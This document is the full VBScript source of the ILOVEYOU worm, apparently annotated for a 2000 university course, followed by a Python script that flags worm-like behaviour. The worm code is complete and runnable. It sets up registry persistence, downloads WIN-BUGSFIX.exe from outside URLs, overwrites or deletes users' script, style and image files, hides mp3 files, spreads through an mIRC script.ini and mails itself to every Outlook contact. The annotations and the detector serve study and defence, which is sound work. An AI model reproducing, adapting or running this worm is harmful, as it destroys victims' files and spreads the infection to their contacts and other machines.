- Source Code to the ILOVEYOU Worm
- rem barok -loveletter(vbe) <i hate go to school>
- rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines
- rem ----------------------------------------
- rem INVOKING SCRIPT
- rem
- rem Effect: Save this in memory and run main
- rem
- rem ----------------------------------------
- On Error Resume Next
- dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
- rem
- eq=""
- ctr=0
- rem
- rem put the contents of this script into vbscopy for later use
- rem
- Set fso = CreateObject("Scripting.FileSystemObject")
- set file = fso.OpenTextFile(WScript.ScriptFullname,1)
- vbscopy=file.ReadAll
- main()
- rem ----------------------------------------
- rem main
- rem
- rem Effect: invokes the relevant routines after setup
- rem
- rem ----------------------------------------
- sub main()
- On Error Resume Next
- dim wscr,rr
- rem
- rem set the timeout to 0
- rem
- set wscr=CreateObject("WScript.Shell")
- rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Time-
- out")
- if (rr>=1) then
- wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Time-
- out",0,"REG_DWORD"
- end if
- rem
- rem set dirwin to root folder of Windows; copy this script into
- rem Win32DLL.vbs in this directory
- rem set dirsystem to Windows system folder; copy this script into
- rem MSKernel32.vbs and LOVE-LETTER-FOR-YOU.TXT.vbs in that directory
- rem set dirtemp to Windows folder used for temp files
- rem
- Set dirwin = fso.GetSpecialFolder(0)
- Set dirsystem = fso.GetSpecialFolder(1)
- Set dirtemp = fso.GetSpecialFolder(2)
- Set c = fso.GetFile(WScript.ScriptFullName)
- c.Copy(dirsystem&"\MSKernel32.vbs")
- c.Copy(dirwin&"\Win32DLL.vbs")
- c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
- rem
- rem go!
- May 9, 2000 ECS 253—Spring 2000 2
- rem
- regruns()
- html()
- spreadtoemail()
- listadriv()
- end sub
- rem ----------------------------------------
- rem regruns
- rem
- rem Effect: If WinFAT32.exe does not exist in the system directory, attempt to
- rem download the program WIN-BUGSFIX.exe into the IE download directory.
- rem On success, set the IE start page to a blank screen (about:blank)
- rem
- rem ----------------------------------------
- sub regruns()
- On Error Resume Next
- Dim num,downread
- rem
- rem Set the following keys:
- rem HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32
- rem to <dirsystem>\MSKernel32.vbs
- rem HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL
- rem to <dirwin>\Win32DLL.vbs
- rem
- regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32",dir-
- system&"\MSKernel32.vbs"
- regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunSer-
- vices\Win32DLL",dirwin&"\Win32DLL.vbs"
- rem
- rem Get the directory into which IE downloads stuff; use c:\ if not set
- rem
- downread=""
- downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory")
- if (downread="") then
- downread="c:\"
- end if
- rem
- rem If <dirsystem>\WinFAT32.exe does not exist, pick a random page
- rem to get it from and download it
- rem
- if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
- Randomize
- num = Int((4 * Rnd) + 1)
- if num = 1 then
- regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyi-
- net.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-
- BUGSFIX.exe"
- elseif num = 2 then
- regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyi-
- net.net/~angelcat/
- skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
- elseif num = 3 then
- regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyi-
- net.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"
- elseif num = 4 then
- regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyi-
- net.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdg-
- lkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe"
- end if
- end if
- rem
- rem If the payload is there, set the keys:
- rem HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX
- rem to <IEdownloaddirorc:\>\WIN-BUGSFIX.exe
- rem and set the startup page for IE to be blank
- rem
- if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
- regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGS-
- FIX",downread&"\WIN-BUGSFIX.exe"
- regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start
- Page","about:blank"
- end if
- end sub
- rem ----------------------------------------
- rem listadriv
- rem
- rem Effect: infect all folders, files that qualify for infection
- rem
- rem ----------------------------------------
- sub listadriv
- On Error Resume Next
- Dim d,dc,s
- rem
- rem get the system drives
- rem
- Set dc = fso.Drives
- rem
- rem If the drive is remote (3) or fixed (2),
- rem call infectfiles on each folder in the tree
- rem
- For Each d in dc
- If d.DriveType = 2 or d.DriveType=3 Then
- folderlist(d.path&"\")
- end if
- Next
- rem no idea what this does; listadriv is a sub, not
- rem a function, and s is uninitialized!
- listadriv = s
- end sub
- rem ----------------------------------------
- rem infectfiles
- rem
- rem Effect: (1) create copies of this thing:
- rem * overwrite vbe, vbs files
- rem * delete js, jse, css, wsh, sct, hta
- rem files, put copies in files with same base name
- rem and vbs extension
- rem * delete jpg, jpeg files, put copies in files
- rem with same name and vbs extension
- rem * mp2, mp3 files, put copies in files with same
- rem name and vbs extension, and hide original files
- rem (2) create/insert a Trojan horse to be invoked when
- rem IRC is run; this seems to send the worm on all
- rem channels when you invoke IRC
- rem
- rem ----------------------------------------
- sub infectfiles(folderspec)
- On Error Resume Next
- dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
- rem
- rem get the files in the folder
- rem
- set f = fso.GetFolder(folderspec)
- set fc = f.Files
- rem
- rem loop through the files
- rem
- for each f1 in fc
- rem
- rem get the file name (s) and the extension (ext)
- rem
- ext=fso.GetExtensionName(f1.path)
- ext=lcase(ext)
- s=lcase(f1.name)
- rem
- rem what it does depends upon the file extension
- rem
- if (ext="vbs") or (ext="vbe") then
- rem it's visual basic
- rem write the contents of WScript.Scriptfullname into the file
- rem (overwrites what is there)
- set ap=fso.OpenTextFile(f1.path,2,true)
- ap.write vbscopy
- ap.close
- elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta")
- then
- rem it's a web-based language (javascript, cascading style sheet, etc.)
- rem write the contents of WScript.Scriptfullname into a file named
- rem the same but with a "vbs" extension; the original file is deleted
- set ap=fso.OpenTextFile(f1.path,2,true)
- ap.write vbscopy
- ap.close
- bname=fso.GetBaseName(f1.path)
- set cop=fso.GetFile(f1.path)
- cop.copy(folderspec&"\"&bname&".vbs")
- fso.DeleteFile(f1.path)
- elseif(ext="jpg") or (ext="jpeg") then
- rem it's a jpeg (picture) file
- rem write the contents of WScript.Scriptfullname into a file named
- rem the same but with a "vbs" extension (delete the original file)
- set ap=fso.OpenTextFile(f1.path,2,true)
- ap.write vbscopy
- ap.close
- set cop=fso.GetFile(f1.path)
- cop.copy(f1.path&".vbs")
- fso.DeleteFile(f1.path)
- elseif(ext="mp3") or (ext="mp2") then
- rem it's an mpeg (movie) file
- rem put the contents of WScript.Scriptfullname into a file with the
- rem same path name but with a "vbs" extension
- set mp3=fso.CreateTextFile(f1.path&".vbs")
- mp3.write vbscopy
- mp3.close
- rem this looks like it's trying to hide the file
- rem attribute 0 is normal, 2 is hidden
- rem if the file's attribute is not normal, the resulting
- rem attribute seems to be meaningless
- set att=fso.GetFile(f1.path)
- att.attributes=att.attributes+2
- end if
- rem
- rem Now go for IRC; this is done once per folder
- rem
- if (eq<>folderspec) then
- if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or
- (s="mirc.hlp") then
- rem if the folder contains any of these,
- rem set a Trojan to trigger when mIRC is next invoked
- set scriptini=fso.CreateTextFile(folderspec&"\script.ini")
- rem this script seems to send the worm file whenever
- rem you join an IRC channel
- scriptini.WriteLine "[script]"
- scriptini.WriteLine ";mIRC Script"
- scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will"
- scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks"
- scriptini.WriteLine ";"
- scriptini.WriteLine ";Khaled Mardam-Bey"
- scriptini.WriteLine ";http://www.mirc.com"
- scriptini.WriteLine ";"
- scriptini.WriteLine "n0=on 1:JOIN:#:{"
- scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
- scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
- scriptini.WriteLine "n3=}"
- scriptini.close
- eq=folderspec
- end if
- end if
- next
- end sub
- rem ----------------------------------------
- rem folderlist
- rem
- rem Effect: Recurse throughout all subfolders
- rem
- rem ----------------------------------------
- sub folderlist(folderspec)
- On Error Resume Next
- dim f,f1,sf
- rem
- rem Get the subfolders in this folder
- rem
- set f = fso.GetFolder(folderspec)
- set sf = f.SubFolders
- rem
- rem call infectfiles on each subfolder and recurse
- rem
- for each f1 in sf
- infectfiles(f1.path)
- folderlist(f1.path)
- next
- end sub
- rem ----------------------------------------
- rem regcreate
- rem
- rem Effect: Change a key in the registry
- rem
- rem ----------------------------------------
- sub regcreate(regkey,regvalue)
- Set regedit = CreateObject("WScript.Shell")
- regedit.RegWrite regkey,regvalue
- end sub
- rem ----------------------------------------
- rem regget
- rem
- rem Effect: Return the value of a key in the registry
- rem
- rem ----------------------------------------
- function regget(value)
- Set regedit = CreateObject("WScript.Shell")
- regget=regedit.RegRead(value)
- end function
- rem ----------------------------------------
- rem fileexist
- rem
- rem Effect: Return 0 if the file exists, 1 if not
- rem
- rem ----------------------------------------
- function fileexist(filespec)
- On Error Resume Next
- dim msg
- if (fso.FileExists(filespec)) Then
- msg = 0
- else
- msg = 1
- end if
- fileexist = msg
- end function
- rem ----------------------------------------
- rem folderexist
- rem
- rem Effect: Return 0 if the folder exists, 1 if not
- rem ??? bogosity -- look at the return statement
- rem ??? also, method GetFolderExists doesn't exist ...
- rem ----------------------------------------
- function folderexist(folderspec)
- On Error Resume Next
- dim msg
- if (fso.GetFolderExists(folderspec)) then
- msg = 0
- else
- msg = 1
- end if
- fileexist = msg
- end function
- rem ----------------------------------------
- rem spreadtoemail
- rem
- rem Effect: send everyone on this user's address book
- rem a copy of the worm as an attachment to a letter
- rem with the subject: "ILOVEYOU" and the body:
- rem "kindly check the attached LOVELETTER coming from me."
- rem ----------------------------------------
- sub spreadtoemail()
- On Error Resume Next
- dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
- rem
- rem access Outlook and get the address lists
- rem
- set regedit=CreateObject("WScript.Shell")
- set out=WScript.CreateObject("Outlook.Application")
- set mapi=out.GetNameSpace("MAPI")
- rem
- rem iterate over the address lists
- rem
- for ctrlists=1 to mapi.AddressLists.Count
- rem get this address list
- set a=mapi.AddressLists(ctrlists)
- x=1
- rem see if there is a corresponding windows address book
- regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
- if (regv="") then
- regv=1
- end if
- rem if there are entries in it, loop through them
- if (int(a.AddressEntries.Count)>int(regv)) then
- for ctrentries=1 to a.AddressEntries.Count
- rem get the entry and see if there is a reg key with their
- rem name in the WAB
- malead=a.AddressEntries(x)
- regad=""
- regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
- rem nope -- create a letter and send it out
- rem the worm is an attachment
- if (regad="") then
- set male=out.CreateItem(0)
- male.Recipients.Add(malead)
- male.Subject = "ILOVEYOU"
- male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
- male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
- male.Send
- rem now create the key
- regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"
- end if
- rem go on to next address
- x=x+1
- next
- rem now put the number of entries into the registry key
- regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
- else
- rem key already exists;
- rem put the number of entries into the registry key
- regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
- end if
- next
- rem
- rem clobber the objects
- rem
- Set out=Nothing
- Set mapi=Nothing
- end sub
- rem ----------------------------------------
- rem html
- rem
- rem Effect: build a web page which, when invoked, will
- rem create this little nasty and run it
- rem it's put into the web page named
- rem <dirsys>\LOVE-LETTER-FOR-YOU.HTM
- rem ----------------------------------------
- sub html
- On Error Resume Next
- dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
- rem
- rem this part is the HTML header that invokes a Java script to
- rem create a window; what follows is a variable to hold the (modified)
- rem form of this script
- rem
- dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META NAME=@-@Generator@-@ CONTENT=@-
- @BAROK VBS - LOVELETTER@-@>"&vbcrlf& _
- "<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-? @GRAMMERSoft Group ?-?
- Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _
- "<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is good...@-@>"&vbcrlf& _
- "<?-?HEAD><BODY ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-
- #,#-#main#-#)@-@ "&vbcrlf& _
- "ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@
- BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _
- "<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read this HTML file<BR>-
- Please press #-#YES#-# button to Enable ActiveX<?-?p>"&vbcrlf& _
- "<?-?CENTER><MARQUEE LOOP=@-@infinite@-@ BGCOLOR=@-@yellow@-@>----------z--------------------
- z----------<?-?MARQUEE> "&vbcrlf& _
- "<?-?BODY><?-?HTML>"&vbcrlf& _
- "<SCRIPT language=@-@JScript@-@>"&vbcrlf& _
- "<!--?-??-?"&vbcrlf& _
- "if (window.screen){var wi=screen.availWidth;var hi=screen.availHeight;win-
- dow.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf& _
- "?-??-?-->"&vbcrlf& _
- "<?-?SCRIPT>"&vbcrlf& _
- "<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _
- "<!--"&vbcrlf& _
- "on error resume next"&vbcrlf& _
- "dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _
- "aw=1"&vbcrlf& _
- "code="
- rem
- rem this part is the visual basic script that decodes the encoded
- rem script and runs it, when invoked by ie; it's appended to the
- rem encoded part and put into the page
- rem
- dta2="set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _
- "set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _
- "code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _
- "code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _
- "code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _
- "set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _
- "wri.write code4"&vbcrlf& _
- "wri.close"&vbcrlf& _
- "if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _
- "if (err.number=424) then"&vbcrlf& _
- "aw=0"&vbcrlf& _
- "end if"&vbcrlf& _
- "if (aw=1) then"&vbcrlf& _
- "document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _
- "window.close"&vbcrlf& _
- "end if"&vbcrlf& _
- "end if"&vbcrlf& _
- "Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _
- "regedit.RegWrite @-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-
- ^Run^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _
- "?-??-?-->"&vbcrlf& _
- "<?-?SCRIPT>"
- dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")
- dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")
- dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
- dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")
- dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")
- dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")
- dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
- dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")
- rem
- rem Open this script
- rem
- set fso=CreateObject("Scripting.FileSystemObject")
- set c=fso.OpenTextFile(WScript.ScriptFullName,1)
- rem
- rem Read contents in and break it into lines
- rem l1 is the number of lines
- rem
- lines=Split(c.ReadAll,vbcrlf)
- l1=ubound(lines)
- for n=0 to ubound(lines)
- rem map: ' to [-[, " ]-], and \ to %-%
- lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91))
- lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
- lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37))
- rem put " ... " around lines, and append &vbcrlf& _ to all
- rem but the last line
- if (l1=n) then
- lines(n)=chr(34)+lines(n)+chr(34)
- else
- lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"
- end if
- next
- rem Create <dirsys>\LOVE-LETTER-FOR-YOU.HTM and open it for
- rem writing; then put the modified script into it with the
- rem HTML header and trailer
- rem
- set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM")
- b.close
- set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2)
- d.write dt5
- d.write join(lines,vbcrlf)
- d.write vbcrlf
- d.write dt6
- d.close
- end sub
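
Added example (not part of the original listing or its annotations): a static triage pass, written from the defender's side, that flags the behaviour categories this listing documents (a script reading or copying its own file, Run/RunServices persistence, Outlook address-book mailing, and document-plus-script double extensions). The rule names, the co-occurrence threshold and both sample scripts are constructed for this example.

```python
import re

# Static indicators for the behaviours the listing documents. Rule names and
# the "two or more categories" threshold are assumptions made for this example.
RULES = {
    "self_copy": [
        re.compile(r'OpenTextFile\s*\(\s*WScript\.ScriptFullName', re.I),
        re.compile(r'GetFile\s*\(\s*WScript\.ScriptFullName', re.I),
    ],
    "persistence": [re.compile(r'\\CurrentVersion\\Run(Services)?\\', re.I)],
    "mass_mail": [
        re.compile(r'CreateObject\s*\(\s*"Outlook\.Application"', re.I),
        re.compile(r'\.AddressEntries\b', re.I),
        re.compile(r'\.Attachments\.Add\b', re.I),
    ],
    "masquerade": [
        # a document/media extension followed directly by a script extension
        re.compile(r'\.(txt|jpe?g|mp[23]|doc|htm)\.(vbs|vbe|js|jse|wsf|hta)\b', re.I),
    ],
}

def triage(script_text):
    """Return {category: [line numbers]} for every rule category that fires."""
    hits = {}
    for lineno, line in enumerate(script_text.splitlines(), start=1):
        stripped = line.strip()
        # Skip comment lines so analyst annotations do not trigger rules.
        if stripped.lower().startswith("rem ") or stripped.startswith("'"):
            continue
        for category, patterns in RULES.items():
            if any(p.search(line) for p in patterns):
                hits.setdefault(category, []).append(lineno)
    return hits

def is_suspicious(script_text, threshold=2):
    """Flag a script when at least `threshold` behaviour categories co-occur."""
    return len(triage(script_text)) >= threshold

# Constructed samples: WORM_LIKE reuses statements quoted in the listing above;
# BENIGN is an invented log-rotation script.
WORM_LIKE = '''rem put the contents of this script into vbscopy
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
regcreate "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\MSKernel32",x
set out=WScript.CreateObject("Outlook.Application")
male.Attachments.Add(dirsystem&"\\LOVE-LETTER-FOR-YOU.TXT.vbs")
'''
BENIGN = '''Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.OpenTextFile("C:\\logs\\app.log", 1)
fso.MoveFile "C:\\logs\\app.log", "C:\\logs\\app.old.log"
'''

if __name__ == "__main__":
    print(triage(WORM_LIKE), is_suspicious(WORM_LIKE))
    print(triage(BENIGN), is_suspicious(BENIGN))
```

Requiring several categories to co-occur keeps ordinary administration scripts, which often touch one of these APIs on their own, from being flagged.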